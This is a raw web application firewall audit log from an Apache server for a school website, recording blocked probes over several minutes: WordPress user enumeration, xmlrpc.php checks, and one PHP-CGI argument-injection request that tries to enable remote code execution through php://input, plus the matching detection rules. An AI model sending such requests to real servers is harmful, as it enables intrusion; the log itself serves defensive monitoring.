Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --555b9408-Z-- --8550d00b-A-- [17/May/2025:08:02:08 +0700] aCfgEATOsBn9MSWb6WJuNwAAAIE 103.236.140.4 43436 103.236.140.4 8181 --8550d00b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8550d00b-C-- demo.sayHello --8550d00b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8550d00b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443728394172 5939 (- - -) Stopwatch2: 1747443728394172 5939; combined=4843, p1=562, p2=4036, p3=40, p4=43, p5=97, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8550d00b-Z-- --bd80eb5c-A-- [17/May/2025:08:03:28 +0700] aCfgYBKi5m5upc8uMd6h6gAAANI 103.236.140.4 43542 103.236.140.4 8181 --bd80eb5c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd80eb5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd80eb5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443808828001 2516 (- - -) Stopwatch2: 1747443808828001 2516; combined=1479, p1=476, p2=960, p3=0, p4=0, p5=43, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd80eb5c-Z-- --2d87af59-A-- [17/May/2025:08:03:37 +0700] aCfgaRKi5m5upc8uMd6h7wAAANc 103.236.140.4 43554 103.236.140.4 8181 --2d87af59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2d87af59-C-- demo.sayHello --2d87af59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d87af59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443817312305 5468 (- - -) Stopwatch2: 1747443817312305 5468; combined=4287, p1=490, p2=3570, p3=30, p4=34, p5=96, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d87af59-Z-- --900c7f0f-A-- [17/May/2025:08:03:43 +0700] aCfgbxKi5m5upc8uMd6h9AAAAMQ 103.236.140.4 43566 103.236.140.4 8181 --900c7f0f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --900c7f0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --900c7f0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443823506235 3316 (- - -) Stopwatch2: 1747443823506235 3316; combined=1421, p1=473, p2=905, p3=0, p4=0, p5=42, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --900c7f0f-Z-- --a5803a2b-A-- [17/May/2025:08:03:48 +0700] aCfgdBKi5m5upc8uMd6h9wAAAMY 103.236.140.4 43574 103.236.140.4 8181 --a5803a2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5803a2b-C-- demo.sayHello --a5803a2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5803a2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443828039244 5951 (- - -) Stopwatch2: 1747443828039244 5951; combined=4355, p1=550, p2=3581, p3=32, p4=37, p5=92, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5803a2b-Z-- --4927e372-A-- [17/May/2025:08:04:07 +0700] aCfghwTOsBn9MSWb6WJuZwAAAIE 103.236.140.4 43600 103.236.140.4 8181 --4927e372-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 12.27.99.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 12.27.99.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4927e372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4927e372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443847138959 2581 (- - -) Stopwatch2: 1747443847138959 2581; combined=1475, p1=483, p2=959, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4927e372-Z-- --ff00f127-A-- [17/May/2025:08:04:32 +0700] aCfgoATOsBn9MSWb6WJuaAAAAIA 103.236.140.4 43620 103.236.140.4 8181 --ff00f127-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff00f127-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff00f127-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443872356114 3248 (- - -) Stopwatch2: 1747443872356114 3248; combined=1431, p1=501, p2=898, p3=0, p4=0, p5=31, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff00f127-Z-- --582d1609-A-- [17/May/2025:08:04:39 +0700] aCfgpwTOsBn9MSWb6WJuagAAAIQ 103.236.140.4 43624 103.236.140.4 8181 --582d1609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --582d1609-C-- demo.sayHello --582d1609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --582d1609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443879407905 4574 (- - -) Stopwatch2: 1747443879407905 4574; combined=3596, p1=447, p2=2950, p3=23, p4=25, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --582d1609-Z-- --fc8afb3a-A-- [17/May/2025:08:09:04 +0700] aCfhsHyxdQCiyU1ENFcneQAAAAk 103.236.140.4 43648 103.236.140.4 8181 --fc8afb3a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc8afb3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc8afb3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444144500450 2418 (- - -) Stopwatch2: 1747444144500450 2418; combined=1025, p1=356, p2=644, p3=0, p4=0, p5=24, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc8afb3a-Z-- --44231a1a-A-- [17/May/2025:08:09:11 +0700] aCfhtwTOsBn9MSWb6WJucgAAAJA 103.236.140.4 43652 103.236.140.4 8181 --44231a1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --44231a1a-C-- demo.sayHello --44231a1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --44231a1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444151511900 5808 (- - -) Stopwatch2: 1747444151511900 5808; combined=4271, p1=549, p2=3440, p3=32, p4=35, p5=122, sr=76, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44231a1a-Z-- --f6b7b031-A-- [17/May/2025:08:10:14 +0700] aCfh9nyxdQCiyU1ENFcnegAAAAo 103.236.140.4 43658 103.236.140.4 8181 --f6b7b031-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6b7b031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6b7b031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444214782685 2888 (- - -) Stopwatch2: 1747444214782685 2888; combined=1550, p1=488, p2=971, p3=0, p4=0, p5=91, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6b7b031-Z-- --0e344c5e-A-- [17/May/2025:08:10:27 +0700] aCfiA-m4kjNN-hEbWjJA6gAAAEM 103.236.140.4 43670 103.236.140.4 8181 --0e344c5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e344c5e-C-- demo.sayHello --0e344c5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e344c5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444227862791 5821 (- - -) Stopwatch2: 1747444227862791 5821; combined=4306, p1=558, p2=3494, p3=31, p4=35, p5=123, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e344c5e-Z-- --dcfa6265-A-- [17/May/2025:08:11:09 +0700] aCfiLRKi5m5upc8uMd6iDQAAAMc 103.236.140.4 43674 103.236.140.4 8181 --dcfa6265-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dcfa6265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcfa6265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444269229960 3212 (- - -) Stopwatch2: 1747444269229960 3212; combined=1425, p1=497, p2=896, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcfa6265-Z-- --1bc08577-A-- [17/May/2025:08:11:14 +0700] aCfiMhKi5m5upc8uMd6iDwAAAMo 103.236.140.4 43678 103.236.140.4 8181 --1bc08577-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bc08577-C-- demo.sayHello --1bc08577-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bc08577-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444274721386 5787 (- - -) Stopwatch2: 1747444274721386 5787; combined=4070, p1=545, p2=3299, p3=26, p4=29, p5=100, sr=74, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bc08577-Z-- --c719163d-A-- [17/May/2025:08:12:31 +0700] aCfifxKi5m5upc8uMd6iFQAAANM 103.236.140.4 43692 103.236.140.4 8181 --c719163d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c719163d-C-- --c719163d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c719163d-E-- --c719163d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444351284855 3977 (- - -) Stopwatch2: 1747444351284855 3977; combined=2188, p1=542, p2=1613, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c719163d-Z-- --b4857522-A-- [17/May/2025:08:13:38 +0700] aCfiwhKi5m5upc8uMd6iGAAAANc 103.236.140.4 43700 103.236.140.4 8181 --b4857522-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4857522-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4857522-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444418672259 3028 (- - -) Stopwatch2: 1747444418672259 3028; combined=1279, p1=426, p2=818, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
